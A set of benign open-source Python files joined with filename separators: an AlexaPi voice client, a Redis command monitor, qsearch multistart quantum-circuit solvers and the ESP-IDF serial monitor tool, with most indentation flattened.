def alexa_speech_recognizer(audio_stream):
# https://developer.amazon.com/public/solutions/alexa/alexa-voice-service/rest/speechrecognizer-requests
url = 'https://access-alexa-na.amazon.com/v1/avs/speechrecognizer/recognize'
boundary = 'this-is-a-boundary'
headers = {
'Authorization': 'Bearer %s' % token,
'Content-Type': 'multipart/form-data; boundary=%s' % boundary,
'Transfer-Encoding': 'chunked',
}
data = alexa_speech_recognizer_generate_data(audio_stream, boundary)
resp = requests.post(url, headers=headers, data=data)
platform.indicate_processing(False)
process_response(resp)
def alexa_getnextitem(navigationToken):
# https://developer.amazon.com/public/solutions/alexa/alexa-voice-service/rest/audioplayer-getnextitem-request
logger.debug("Sending GetNextItem Request...")
url = 'https://access-alexa-na.amazon.com/v1/avs/audioplayer/getNextItem'
headers = {
'Authorization': 'Bearer %s' % token,
'content-type': 'application/json; charset=UTF-8'
}
data = {
"messageHeader": {},
"messageBody": {
"navigationToken": navigationToken
}
}
response = requests.post(url, headers=headers, data=json.dumps(data))
process_response(response)
def alexa_playback_progress_report_request(requestType, playerActivity, stream_id):
# https://developer.amazon.com/public/solutions/alexa/alexa-voice-service/rest/audioplayer-events-requests
# streamId Specifies the identifier for the current stream.
# offsetInMilliseconds Specifies the current position in the track, in milliseconds.
# playerActivity IDLE, PAUSED, or PLAYING
logger.debug("Sending Playback Progress Report Request...")
headers = {
'Authorization': 'Bearer %s' % token
}
data = {
"messageHeader": {},
"messageBody": {
"playbackState": {
"streamId": stream_id,
"offsetInMilliseconds": 0,
"playerActivity": playerActivity.upper()
}
}
}
if requestType.upper() == RequestType.ERROR:
# The Playback Error method sends a notification to AVS that the audio player has experienced an issue during playback.
url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackError"
elif requestType.upper() == RequestType.FINISHED:
# The Playback Finished method sends a notification to AVS that the audio player has completed playback.
url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackFinished"
elif requestType.upper() == PlayerActivity.IDLE: # This is an error as described in https://github.com/alexa-pi/AlexaPi/issues/117
# The Playback Idle method sends a notification to AVS that the audio player has reached the end of the playlist.
url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackIdle"
elif requestType.upper() == RequestType.INTERRUPTED:
# The Playback Interrupted method sends a notification to AVS that the audio player has been interrupted.
# Note: The audio player may have been interrupted by a previous stop Directive.
url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackInterrupted"
elif requestType.upper() == "PROGRESS_REPORT":
# The Playback Progress Report method sends a notification to AVS with the current state of the audio player.
url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackProgressReport"
elif requestType.upper() == RequestType.STARTED:
# The Playback Started method sends a notification to AVS that the audio player has started playing.
url = "https://access-alexa-na.amazon.com/v1/avs/audioplayer/playbackStarted"
response = requests.post(url, headers=headers, data=json.dumps(data))
if response.status_code != 204:
logger.warning("(alexa_playback_progress_report_request Response) %s", response)
else:
logger.debug("Playback Progress Report was Successful")
def process_response(response):
logger.debug("Processing Request Response...")
if response.status_code == 204:
logger.debug("Request Response is null (This is OKAY!)")
return
if response.status_code != 200:
logger.info("(process_response Error) Status Code: %s", response.status_code)
response.connection.close()
platform.indicate_failure()
return
try:
data = bytes("Content-Type: ", 'utf-8') + bytes(response.headers['content-type'], 'utf-8') + bytes('\r\n\r\n',
'utf-8') + response.content
msg = email.message_from_bytes(data) # pylint: disable=no-member
except AttributeError:
data = "Content-Type: " + response.headers['content-type'] + '\r\n\r\n' + response.content
msg = email.message_from_string(data)
for payload in msg.get_payload():
if payload.get_content_type() == "application/json":
j = json.loads(payload.get_payload())
logger.debug("JSON String Returned: %s", json.dumps(j, indent=2))
elif payload.get_content_type() == "audio/mpeg":
filename = tmp_path + hashlib.md5(payload.get('Content-ID').strip("<>").encode()).hexdigest() + ".mp3"
with open(filename, 'wb') as f:
f.write(payload.get_payload(decode=True))
else:
logger.debug("NEW CONTENT TYPE RETURNED: %s", payload.get_content_type())
# Now process the response
if 'directives' in j['messageBody']:
if not j['messageBody']['directives']:
logger.debug("0 Directives received")
for directive in j['messageBody']['directives']:
if directive['namespace'] == 'SpeechSynthesizer':
if directive['name'] == 'speak':
player.play_speech("file://" + tmp_path + hashlib.md5(
directive['payload']['audioContent'].replace("cid:", "", 1).encode()).hexdigest() + ".mp3")
elif directive['namespace'] == 'SpeechRecognizer':
if directive['name'] == 'listen':
logger.debug("Further Input Expected, timeout in: %sms",
directive['payload']['timeoutIntervalInMillis'])
player.play_speech(resources_path + 'beep.wav')
timeout = directive['payload']['timeoutIntervalInMillis'] / 116
audio_stream = capture.silence_listener(timeout)
# now process the response
alexa_speech_recognizer(audio_stream)
elif directive['namespace'] == 'AudioPlayer':
if directive['name'] == 'play':
player.play_playlist(directive['payload'])
elif directive['namespace'] == "Speaker":
# speaker control such as volume
if directive['name'] == 'SetVolume':
vol_token = directive['payload']['volume']
type_token = directive['payload']['adjustmentType']
if (type_token == 'relative'):
volume = player.get_volume() + int(vol_token)
else:
volume = int(vol_token)
if (volume > MAX_VOLUME):
volume = MAX_VOLUME
elif (volume < MIN_VOLUME):
volume = MIN_VOLUME
player.set_volume(volume)
logger.debug("new volume = %s", volume)
    # Additional audio item
elif 'audioItem' in j['messageBody']:
player.play_playlist(j['messageBody'])
trigger_thread = None
def trigger_callback(trigger):
global trigger_thread
logger.info("Triggered: %s", trigger.name)
triggers.disable()
trigger_thread = threading.Thread(target=trigger_process, args=(trigger,))
trigger_thread.setDaemon(True)
trigger_thread.start()
def trigger_process(trigger):
if player.is_playing():
player.stop()
# clean up the temp directory
if not debug:
for some_file in os.listdir(tmp_path):
file_path = os.path.join(tmp_path, some_file)
try:
if os.path.isfile(file_path):
os.remove(file_path)
except Exception as exp: # pylint: disable=broad-except
logger.warning(exp)
if event_commands['pre_interaction']:
subprocess.Popen(event_commands['pre_interaction'], shell=True, stdout=subprocess.PIPE)
force_record = None
if trigger.event_type in triggers.types_continuous:
force_record = (trigger.continuous_callback, trigger.event_type in triggers.types_vad)
if trigger.voice_confirm:
player.play_speech(resources_path + 'alexayes.mp3')
audio_stream = capture.silence_listener(force_record=force_record)
alexa_speech_recognizer(audio_stream)
triggers.enable()
if event_commands['post_interaction']:
subprocess.Popen(event_commands['post_interaction'], shell=True, stdout=subprocess.PIPE)
def cleanup(signal, frame): # pylint: disable=redefined-outer-name,unused-argument
triggers.disable()
triggers.cleanup()
capture.cleanup()
pHandler.cleanup()
platform.cleanup()
shutil.rmtree(tmp_path)
if event_commands['shutdown']:
subprocess.Popen(event_commands['shutdown'], shell=True, stdout=subprocess.PIPE)
sys.exit(0)
if __name__ == "__main__":
if event_commands['startup']:
subprocess.Popen(event_commands['startup'], shell=True, stdout=subprocess.PIPE)
try:
capture = alexapi.capture.Capture(config, tmp_path)
capture.setup(platform.indicate_recording)
triggers.init(config, trigger_callback, capture)
triggers.setup()
except ConfigurationException as exp:
logger.critical(exp)
sys.exit(1)
pHandler.setup()
platform.setup()
for sig in (signal.SIGABRT, signal.SIGILL, signal.SIGINT, signal.SIGSEGV, signal.SIGTERM):
signal.signal(sig, cleanup)
logger.info("Checking Internet Connection ...")
while not internet_on():
time.sleep(1)
try:
token = Token(config['alexa'])
if not str(token):
raise RuntimeError
except (ConfigurationException, RuntimeError):
platform.indicate_failure()
sys.exit(1)
platform_trigger_callback = triggers.triggers[
'platform'].platform_callback if 'platform' in triggers.triggers else None
platform.after_setup(platform_trigger_callback)
triggers.enable()
if not silent:
player.play_speech(resources_path + "hello.mp3")
platform.indicate_success()
while True:
time.sleep(1)
|
monitor_all_redis.py
|
import datetime
import threading
import redis
import config
class Monitor():
def __init__(self, connection_pool):
self.connection_pool = connection_pool
self.connection = None
def __del__(self):
try:
self.reset()
except:
pass
def reset(self):
if self.connection:
self.connection_pool.release(self.connection)
self.connection = None
def monitor(self):
if self.connection is None:
self.connection = self.connection_pool.get_connection(
'monitor', None)
self.connection.send_command("monitor")
return self.listen()
def parse_response(self):
return self.connection.read_response()
def listen(self):
while True:
yield self.parse_response()
def run_monitor(address):
host, port = address.split(':')
pool = redis.ConnectionPool(host=host, port=port)
monitor = Monitor(pool)
commands = monitor.monitor()
for c in commands:
print(address, datetime.datetime.now(), c)
# Need to put this in your /etc/hosts
# 127.0.0.1 redis6000
# 127.0.0.1 redis6001
# ...
if __name__ == '__main__':
redis_addresses = config.DOCKER_COMPOSE_CONFIG['redis_addresses']
for addr in redis_addresses:
        # Pass the address as an argument so each thread gets its own value;
        # a lambda here would capture the loop variable by reference and all
        # threads would end up monitoring the last address.
        threading.Thread(target=run_monitor, args=(addr,)).start()
|
multistart_solvers.py
|
"""
This module defines solvers that use multiple starting points in order to have a higher chance at finding the global minimum.
"""
from . import utils, logging
from .solvers import Solver, default_solver
import numpy as np
import scipy as sp
import scipy.optimize
from qsrs import native_from_object
import time
from math import pi, gamma, sqrt
import multiprocessing as mp
import sys
from .persistent_aposmm import initialize_APOSMM, decide_where_to_start_localopt, update_history_dist, add_to_local_H
def distance_for_x(x, options, circuit):
"""Calculate the distance between circuit and the target for input x based on the distance metric"""
if options.inner_solver.distance_metric == "Frobenius":
return options.error_func(options.target, circuit.matrix(x))
elif options.inner_solver.distance_metric == "Residuals":
return np.sum(options.error_residuals(options.target, circuit.matrix(x), np.eye(options.target.shape[0]))**2)
def optimize_worker(circuit, options, q, x0):
"""Worker function used to run the inner solver in parallel"""
_, xopt = options.inner_solver.solve_for_unitary(circuit, options, x0)
q.put((distance_for_x(xopt, options, circuit), xopt))
class MultiStart_Solver(Solver):
"""A higher accuracy solver based on APOSMM https://www.mcs.anl.gov/~jlarson/APOSMM/
MultiStart_Solver generally gets better results than other optimizers due to the advanced algorithm
to start multiple local optimizers ("inner solvers") and find the global optimum more often.
"""
def __init__(self, num_threads):
"""Create a MultiStart_Solver instance. Pass num_threads to set how many threads to use in parallel optimization runs"""
self.num_threads = num_threads
self.ctx = mp.get_context('fork') if sys.platform != 'win32' else mp.get_context()
def solve_for_unitary(self, circuit, options, x0=None):
"""Optimize the given circuit based on the provided options with initial point x0 (optional).
Args:
circuit: A qsearch.gates.Gate describing the circuit to optimize
options: This uses the following options:
- inner_solver : which optimizer to use for local optimization runs
- target : the target unitary of synthesis
- logger : A qsearch.logging.Logger that will be used for logging the synthesis process.
- error_func : The function that the Solver will attempt to minimize.
- error_residuals : A function that returns an array of real-valued residuals to be used by a least-squares-based Solver.
            x0: the starting point for the optimizer
"""
if 'inner_solver' not in options:
options.inner_solver = default_solver(options)
U = options.target
logger = options.logger if "logger" in options else logging.Logger(verbosity=options.verbosity, stdout_enabled=options.stdout_enabled, output_file=options.log_file)
#np.random.seed(4) # usually we do not want fixed seeds, but it can be useful for some debugging
n = circuit.num_inputs # the number of parameters to optimize (the length that v should be when passed to one of the lambdas created above)
initial_sample_size = 100 # How many points do you want to sample before deciding where to start runs.
num_localopt_runs = self.num_threads # How many localopt runs to start?
specs = {'lb': np.zeros(n),
'ub': np.ones(n),
'standalone': True,
'initial_sample_size':initial_sample_size}
_, _, rk_const, ld, mu, nu, _, H = initialize_APOSMM([],specs,None)
initial_sample = np.random.uniform(0, 1, (initial_sample_size, n))
add_to_local_H(H, initial_sample, specs, on_cube=True)
for i, x in enumerate(initial_sample):
H['f'][i] = distance_for_x(2*np.pi*x, options, circuit)
H[['returned']] = True
update_history_dist(H, n)
starting_inds = decide_where_to_start_localopt(H, n, initial_sample_size, rk_const, ld, mu, nu)
starting_points = H['x'][starting_inds[:num_localopt_runs]]
start = time.time()
q = self.ctx.Queue()
processes = []
rets = []
for x0 in starting_points:
p = self.ctx.Process(target=optimize_worker, args=(circuit, options, q, 2*np.pi*x0))
processes.append(p)
p.start()
for p in processes:
ret = q.get() # will block
rets.append(ret)
for p in processes:
p.join()
end = time.time()
best_found = np.argmin([r[0] for r in rets])
best_val = rets[best_found][0]
xopt = rets[best_found][1]
return (circuit.matrix(xopt), xopt)
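# Illustrative sketch (an assumption, not part of the original module): the
# solver is normally plugged into the qsearch options so that synthesis uses
# it for every solve_for_unitary() call, e.g.
#   options.solver = MultiStart_Solver(num_threads=8)
# Each call then launches num_threads local optimization runs from
# APOSMM-chosen starting points and keeps the best result found.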
class NaiveMultiStart_Solver(Solver):
"""A naive but effective multi-start solver which tries to cover as much of the optimization space at once"""
def __init__(self, num_threads):
"""Create a NaiveMultiStart_Solver instance. Pass num_threads to set how many threads to use in parallel optimization runs"""
self.threads = num_threads if num_threads else 1
self.ctx = mp.get_context('fork') if sys.platform != 'win32' else mp.get_context()
def solve_for_unitary(self, circuit, options, x0=None):
if 'inner_solver' not in options:
options.inner_solver = default_solver(options)
U = options.target
logger = options.logger if "logger" in options else logging.Logger(verbosity=options.verbosity, stdout_enabled=options.stdout_enabled, output_file=options.log_file)
n = circuit.num_inputs
initial_samples = [np.random.uniform((i - 1)/self.threads, i/self.threads, (circuit.num_inputs,)) for i in range(1, self.threads+1)]
q = self.ctx.Queue()
processes = []
rets = []
for x0 in initial_samples:
p = self.ctx.Process(target=optimize_worker, args=(circuit, options, q, x0))
processes.append(p)
p.start()
for p in processes:
ret = q.get() # will block
rets.append(ret)
for p in processes:
p.join()
best_found = np.argmin([r[0] for r in rets])
best_val = rets[best_found][0]
xopt = rets[best_found][1]
return (circuit.matrix(xopt), xopt)
|
idf_monitor.py
|
#!/usr/bin/env python
#
# esp-idf serial output monitor tool. Does some helpful things:
# - Looks up hex addresses in ELF file with addr2line
# - Reset ESP32 via serial RTS line (Ctrl-T Ctrl-R)
# - Run "make (or idf.py) flash" (Ctrl-T Ctrl-F)
# - Run "make (or idf.py) app-flash" (Ctrl-T Ctrl-A)
# - If gdbstub output is detected, gdb is automatically loaded
#
# Copyright 2015-2016 Espressif Systems (Shanghai) PTE LTD
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Contains elements taken from miniterm "Very simple serial terminal" which
# is part of pySerial. https://github.com/pyserial/pyserial
# (C)2002-2015 Chris Liechti <cliechti@gmx.net>
#
# Originally released under BSD-3-Clause license.
#
from __future__ import print_function, division
from __future__ import unicode_literals
from builtins import chr
from builtins import object
from builtins import bytes
import subprocess
import argparse
import codecs
import re
import os
try:
import queue
except ImportError:
import Queue as queue
import shlex
import time
import sys
import serial
import serial.tools.miniterm as miniterm
import threading
import ctypes
import types
from distutils.version import StrictVersion
key_description = miniterm.key_description
# Control-key characters
CTRL_A = '\x01'
CTRL_B = '\x02'
CTRL_F = '\x06'
CTRL_H = '\x08'
CTRL_R = '\x12'
CTRL_T = '\x14'
CTRL_Y = '\x19'
CTRL_P = '\x10'
CTRL_RBRACKET = '\x1d' # Ctrl+]
# ANSI terminal codes (if changed, regular expressions in LineMatcher need to be updated)
ANSI_RED = '\033[1;31m'
ANSI_YELLOW = '\033[0;33m'
ANSI_NORMAL = '\033[0m'
def color_print(message, color):
""" Print a message to stderr with colored highlighting """
sys.stderr.write("%s%s%s\n" % (color, message, ANSI_NORMAL))
def yellow_print(message):
color_print(message, ANSI_YELLOW)
def red_print(message):
color_print(message, ANSI_RED)
__version__ = "1.1"
# Tags for tuples in queues
TAG_KEY = 0
TAG_SERIAL = 1
TAG_SERIAL_FLUSH = 2
# regex matches a potential PC value (0x4xxxxxxx)
MATCH_PCADDR = re.compile(r'0x4[0-9a-f]{7}', re.IGNORECASE)
DEFAULT_TOOLCHAIN_PREFIX = "xtensa-lx106-elf-"
DEFAULT_PRINT_FILTER = ""
class StoppableThread(object):
"""
Provide a Thread-like class which can be 'cancelled' via a subclass-provided
cancellation method.
Can be started and stopped multiple times.
Isn't an instance of type Thread because Python Thread objects can only be run once
"""
def __init__(self):
self._thread = None
@property
def alive(self):
"""
Is 'alive' whenever the internal thread object exists
"""
return self._thread is not None
def start(self):
if self._thread is None:
self._thread = threading.Thread(target=self._run_outer)
self._thread.start()
def _cancel(self):
pass # override to provide cancellation functionality
def run(self):
pass # override for the main thread behaviour
def _run_outer(self):
try:
self.run()
finally:
self._thread = None
def stop(self):
if self._thread is not None:
old_thread = self._thread
self._thread = None
self._cancel()
old_thread.join()
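# Minimal illustrative subclass (not part of the original source) showing the
# StoppableThread contract: run() loops while 'alive' is true, and _cancel()
# would unblock anything run() waits on (nothing, in this trivial example).
class _ExamplePollerThread(StoppableThread):
    def run(self):
        while self.alive:
            time.sleep(0.1)  # periodic work would go here
    def _cancel(self):
        pass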
class ConsoleReader(StoppableThread):
""" Read input keys from the console and push them to the queue,
until stopped.
"""
def __init__(self, console, event_queue, test_mode):
super(ConsoleReader, self).__init__()
self.console = console
self.event_queue = event_queue
self.test_mode = test_mode
def run(self):
self.console.setup()
try:
while self.alive:
try:
if os.name == 'nt':
# Windows kludge: because the console.cancel() method doesn't
# seem to work to unblock getkey() on the Windows implementation.
#
# So we only call getkey() if we know there's a key waiting for us.
import msvcrt
while not msvcrt.kbhit() and self.alive:
time.sleep(0.1)
if not self.alive:
break
elif self.test_mode:
                        # In testing mode stdin is connected to a PTY but is not used for any input. For a PTY,
                        # cancellation via fcntl.ioctl does not work and we would hang in self.console.getkey().
# Therefore, we avoid calling it.
while self.alive:
time.sleep(0.1)
break
c = self.console.getkey()
except KeyboardInterrupt:
c = '\x03'
if c is not None:
self.event_queue.put((TAG_KEY, c), False)
finally:
self.console.cleanup()
def _cancel(self):
if os.name == 'posix' and not self.test_mode:
# this is the way cancel() is implemented in pyserial 3.3 or newer,
# older pyserial (3.1+) has cancellation implemented via 'select',
# which does not work when console sends an escape sequence response
#
# even older pyserial (<3.1) does not have this method
#
# on Windows there is a different (also hacky) fix, applied above.
#
# note that TIOCSTI is not implemented in WSL / bash-on-Windows.
# TODO: introduce some workaround to make it work there.
#
# Note: This would throw exception in testing mode when the stdin is connected to PTY.
import fcntl
import termios
fcntl.ioctl(self.console.fd, termios.TIOCSTI, b'\0')
class SerialReader(StoppableThread):
""" Read serial data from the serial port and push to the
event queue, until stopped.
"""
def __init__(self, serial, event_queue):
super(SerialReader, self).__init__()
self.baud = serial.baudrate
self.serial = serial
self.event_queue = event_queue
if not hasattr(self.serial, 'cancel_read'):
# enable timeout for checking alive flag,
# if cancel_read not available
self.serial.timeout = 0.25
def run(self):
if not self.serial.is_open:
self.serial.baudrate = self.baud
self.serial.rts = True # Force an RTS reset on open
self.serial.open()
self.serial.rts = False
try:
while self.alive:
data = self.serial.read(self.serial.in_waiting or 1)
if len(data):
self.event_queue.put((TAG_SERIAL, data), False)
finally:
self.serial.close()
def _cancel(self):
if hasattr(self.serial, 'cancel_read'):
try:
self.serial.cancel_read()
except Exception:
pass
class LineMatcher(object):
"""
Assembles a dictionary of filtering rules based on the --print_filter
argument of idf_monitor. Then later it is used to match lines and
determine whether they should be shown on screen or not.
"""
LEVEL_N = 0
LEVEL_E = 1
LEVEL_W = 2
LEVEL_I = 3
LEVEL_D = 4
LEVEL_V = 5
level = {'N': LEVEL_N, 'E': LEVEL_E, 'W': LEVEL_W, 'I': LEVEL_I, 'D': LEVEL_D,
'V': LEVEL_V, '*': LEVEL_V, '': LEVEL_V}
def __init__(self, print_filter):
self._dict = dict()
self._re = re.compile(r'^(?:\033\[[01];?[0-9]+m?)?([EWIDV]) \([0-9]+\) ([^:]+): ')
items = print_filter.split()
if len(items) == 0:
self._dict["*"] = self.LEVEL_V # default is to print everything
for f in items:
s = f.split(r':')
if len(s) == 1:
# specifying no warning level defaults to verbose level
lev = self.LEVEL_V
elif len(s) == 2:
if len(s[0]) == 0:
raise ValueError('No tag specified in filter ' + f)
try:
lev = self.level[s[1].upper()]
except KeyError:
raise ValueError('Unknown warning level in filter ' + f)
else:
raise ValueError('Missing ":" in filter ' + f)
self._dict[s[0]] = lev
def match(self, line):
try:
m = self._re.search(line)
if m:
lev = self.level[m.group(1)]
if m.group(2) in self._dict:
return self._dict[m.group(2)] >= lev
return self._dict.get("*", self.LEVEL_N) >= lev
except (KeyError, IndexError):
            # Regular line written with something other than ESP_LOG*
            # or an empty line.
pass
        # We need something more than "*:N" for printing.
return self._dict.get("*", self.LEVEL_N) > self.LEVEL_N
class SerialStopException(Exception):
"""
This exception is used for stopping the IDF monitor in testing mode.
"""
pass
class Monitor(object):
"""
Monitor application main class.
This was originally derived from miniterm.Miniterm, but it turned out to be easier to write from scratch for this
purpose.
Main difference is that all event processing happens in the main thread, not the worker threads.
"""
def __init__(self, serial_instance, elf_file, print_filter, make="make", toolchain_prefix=DEFAULT_TOOLCHAIN_PREFIX, eol="CRLF"):
super(Monitor, self).__init__()
self.event_queue = queue.Queue()
self.console = miniterm.Console()
if os.name == 'nt':
sys.stderr = ANSIColorConverter(sys.stderr, decode_output=True)
self.console.output = ANSIColorConverter(self.console.output)
self.console.byte_output = ANSIColorConverter(self.console.byte_output)
if StrictVersion(serial.VERSION) < StrictVersion('3.3.0'):
# Use Console.getkey implementation from 3.3.0 (to be in sync with the ConsoleReader._cancel patch above)
def getkey_patched(self):
c = self.enc_stdin.read(1)
if c == chr(0x7f):
c = chr(8) # map the BS key (which yields DEL) to backspace
return c
self.console.getkey = types.MethodType(getkey_patched, self.console)
        socket_mode = serial_instance.port.startswith("socket://") # testing hook - data from the serial port can make the monitor exit
self.serial = serial_instance
self.console_reader = ConsoleReader(self.console, self.event_queue, socket_mode)
self.serial_reader = SerialReader(self.serial, self.event_queue)
self.elf_file = elf_file
if not os.path.exists(make):
self.make = shlex.split(make) # allow for possibility the "make" arg is a list of arguments (for idf.py)
else:
self.make = make
self.toolchain_prefix = toolchain_prefix
self.menu_key = CTRL_T
self.exit_key = CTRL_RBRACKET
self.translate_eol = {
"CRLF": lambda c: c.replace("\n", "\r\n"),
"CR": lambda c: c.replace("\n", "\r"),
"LF": lambda c: c.replace("\r", "\n"),
}[eol]
# internal state
self._pressed_menu_key = False
self._last_line_part = b""
self._gdb_buffer = b""
self._pc_address_buffer = b""
self._line_matcher = LineMatcher(print_filter)
self._invoke_processing_last_line_timer = None
self._force_line_print = False
self._output_enabled = True
self._serial_check_exit = socket_mode
def invoke_processing_last_line(self):
self.event_queue.put((TAG_SERIAL_FLUSH, b''), False)
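    # Note (summary derived from the handlers in main_loop below): event queue entries
    # are (tag, data) tuples - (TAG_KEY, key_char) pushed by the console reader,
    # (TAG_SERIAL, raw_bytes) pushed by the serial reader, and (TAG_SERIAL_FLUSH, b'')
    # pushed by the line-flush timer above.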
def main_loop(self):
self.console_reader.start()
self.serial_reader.start()
try:
while self.console_reader.alive and self.serial_reader.alive:
(event_tag, data) = self.event_queue.get()
if event_tag == TAG_KEY:
self.handle_key(data)
elif event_tag == TAG_SERIAL:
self.handle_serial_input(data)
if self._invoke_processing_last_line_timer is not None:
self._invoke_processing_last_line_timer.cancel()
self._invoke_processing_last_line_timer = threading.Timer(0.1, self.invoke_processing_last_line)
self._invoke_processing_last_line_timer.start()
                    # If no further data is received within the next short period
                    # of time, the _invoke_processing_last_line_timer generates an
                    # event which results in the last line being finished. This is
                    # a fix for handling lines sent without EOL.
elif event_tag == TAG_SERIAL_FLUSH:
self.handle_serial_input(data, finalize_line=True)
else:
raise RuntimeError("Bad event data %r" % ((event_tag,data),))
except SerialStopException:
sys.stderr.write(ANSI_NORMAL + "Stopping condition has been received\n")
finally:
try:
self.console_reader.stop()
self.serial_reader.stop()
# Cancelling _invoke_processing_last_line_timer is not
# important here because receiving empty data doesn't matter.
self._invoke_processing_last_line_timer = None
except Exception:
pass
sys.stderr.write(ANSI_NORMAL + "\n")
def handle_key(self, key):
if self._pressed_menu_key:
self.handle_menu_key(key)
self._pressed_menu_key = False
elif key == self.menu_key:
self._pressed_menu_key = True
elif key == self.exit_key:
self.console_reader.stop()
self.serial_reader.stop()
else:
try:
key = self.translate_eol(key)
self.serial.write(codecs.encode(key))
except serial.SerialException:
pass # this shouldn't happen, but sometimes port has closed in serial thread
except UnicodeEncodeError:
pass # this can happen if a non-ascii character was passed, ignoring
def handle_serial_input(self, data, finalize_line=False):
sp = data.split(b'\n')
if self._last_line_part != b"":
# add unprocessed part from previous "data" to the first line
sp[0] = self._last_line_part + sp[0]
self._last_line_part = b""
if sp[-1] != b"":
# last part is not a full line
self._last_line_part = sp.pop()
for line in sp:
if line != b"":
if self._serial_check_exit and line == self.exit_key.encode('latin-1'):
raise SerialStopException()
if self._output_enabled and (self._force_line_print or self._line_matcher.match(line.decode(errors="ignore"))):
self.console.write_bytes(line + b'\n')
self.handle_possible_pc_address_in_line(line)
self.check_gdbstub_trigger(line)
self._force_line_print = False
        # Now we have the last part (an incomplete line) in _last_line_part. By
        # default we don't touch it and just wait for the rest of the line to
        # arrive. But if it still hasn't arrived after some time, we need to
        # make a decision.
if self._last_line_part != b"":
if self._force_line_print or (finalize_line and self._line_matcher.match(self._last_line_part.decode(errors="ignore"))):
self._force_line_print = True
if self._output_enabled:
self.console.write_bytes(self._last_line_part)
self.handle_possible_pc_address_in_line(self._last_line_part)
self.check_gdbstub_trigger(self._last_line_part)
# It is possible that the incomplete line cuts in half the PC
# address. A small buffer is kept and will be used the next time
# handle_possible_pc_address_in_line is invoked to avoid this problem.
# MATCH_PCADDR matches 10 character long addresses. Therefore, we
# keep the last 9 characters.
self._pc_address_buffer = self._last_line_part[-9:]
# GDB sequence can be cut in half also. GDB sequence is 7
# characters long, therefore, we save the last 6 characters.
self._gdb_buffer = self._last_line_part[-6:]
self._last_line_part = b""
# else: keeping _last_line_part and it will be processed the next time
# handle_serial_input is invoked
def handle_possible_pc_address_in_line(self, line):
line = self._pc_address_buffer + line
self._pc_address_buffer = b""
for m in re.finditer(MATCH_PCADDR, line.decode(errors="ignore")):
self.lookup_pc_address(m.group())
def handle_menu_key(self, c):
if c == self.exit_key or c == self.menu_key: # send verbatim
self.serial.write(codecs.encode(c))
elif c in [CTRL_H, 'h', 'H', '?']:
red_print(self.get_help_text())
elif c == CTRL_R: # Reset device via RTS
self.serial.setRTS(True)
time.sleep(0.2)
self.serial.setRTS(False)
self.output_enable(True)
elif c == CTRL_F: # Recompile & upload
self.run_make("flash")
elif c == CTRL_A: # Recompile & upload app only
self.run_make("app-flash")
elif c == CTRL_Y: # Toggle output display
self.output_toggle()
elif c == CTRL_P:
yellow_print("Pause app (enter bootloader mode), press Ctrl-T Ctrl-R to restart")
            # quickly trigger the pause without having to press the menu key first
self.serial.setDTR(False) # IO0=HIGH
self.serial.setRTS(True) # EN=LOW, chip in reset
time.sleep(1.3) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.1
self.serial.setDTR(True) # IO0=LOW
self.serial.setRTS(False) # EN=HIGH, chip out of reset
time.sleep(0.45) # timeouts taken from esptool.py, includes esp32r0 workaround. defaults: 0.05
self.serial.setDTR(False) # IO0=HIGH, done
else:
red_print('--- unknown menu character {} --'.format(key_description(c)))
def get_help_text(self):
return """
--- idf_monitor ({version}) - ESP-IDF monitor tool
--- based on miniterm from pySerial
---
--- {exit:8} Exit program
--- {menu:8} Menu escape key, followed by:
--- Menu keys:
--- {menu:7} Send the menu character itself to remote
--- {exit:7} Send the exit character itself to remote
--- {reset:7} Reset target board via RTS line
--- {makecmd:7} Build & flash project
--- {appmake:7} Build & flash app only
--- {output:7} Toggle output display
--- {pause:7} Reset target into bootloader to pause app via RTS line
""".format(version=__version__,
exit=key_description(self.exit_key),
menu=key_description(self.menu_key),
reset=key_description(CTRL_R),
makecmd=key_description(CTRL_F),
appmake=key_description(CTRL_A),
output=key_description(CTRL_Y),
pause=key_description(CTRL_P))
def __enter__(self):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.serial_reader.stop()
self.console_reader.stop()
def __exit__(self, *args, **kwargs):
""" Use 'with self' to temporarily disable monitoring behaviour """
self.console_reader.start()
self.serial_reader.start()
def prompt_next_action(self, reason):
self.console.setup() # set up console to trap input characters
try:
red_print("""
--- {}
--- Press {} to exit monitor.
--- Press {} to build & flash project.
--- Press {} to build & flash app.
--- Press any other key to resume monitor (resets target).""".format(reason,
key_description(self.exit_key),
key_description(CTRL_F),
key_description(CTRL_A)))
k = CTRL_T # ignore CTRL-T here, so people can muscle-memory Ctrl-T Ctrl-F, etc.
while k == CTRL_T:
k = self.console.getkey()
finally:
self.console.cleanup()
if k == self.exit_key:
self.event_queue.put((TAG_KEY, k))
elif k in [CTRL_F, CTRL_A]:
self.event_queue.put((TAG_KEY, self.menu_key))
self.event_queue.put((TAG_KEY, k))
def run_make(self, target):
with self:
if isinstance(self.make, list):
popen_args = self.make + [target]
else:
popen_args = [self.make, target]
yellow_print("Running %s..." % " ".join(popen_args))
p = subprocess.Popen(popen_args)
try:
p.wait()
except KeyboardInterrupt:
p.wait()
if p.returncode != 0:
self.prompt_next_action("Build failed")
else:
self.output_enable(True)
def lookup_pc_address(self, pc_addr):
cmd = ["%saddr2line" % self.toolchain_prefix,
"-pfiaC", "-e", self.elf_file, pc_addr]
try:
translation = subprocess.check_output(cmd, cwd=".")
if b"?? ??:0" not in translation:
yellow_print(translation.decode())
except OSError as e:
red_print("%s: %s" % (" ".join(cmd), e))
def check_gdbstub_trigger(self, line):
line = self._gdb_buffer + line
self._gdb_buffer = b""
m = re.search(b"\\$(T..)#(..)", line) # look for a gdb "reason" for a break
if m is not None:
try:
chsum = sum(ord(bytes([p])) for p in m.group(1)) & 0xFF
calc_chsum = int(m.group(2), 16)
except ValueError:
return # payload wasn't valid hex digits
if chsum == calc_chsum:
self.run_gdb()
else:
red_print("Malformed gdb message... calculated checksum %02x received %02x" % (chsum, calc_chsum))
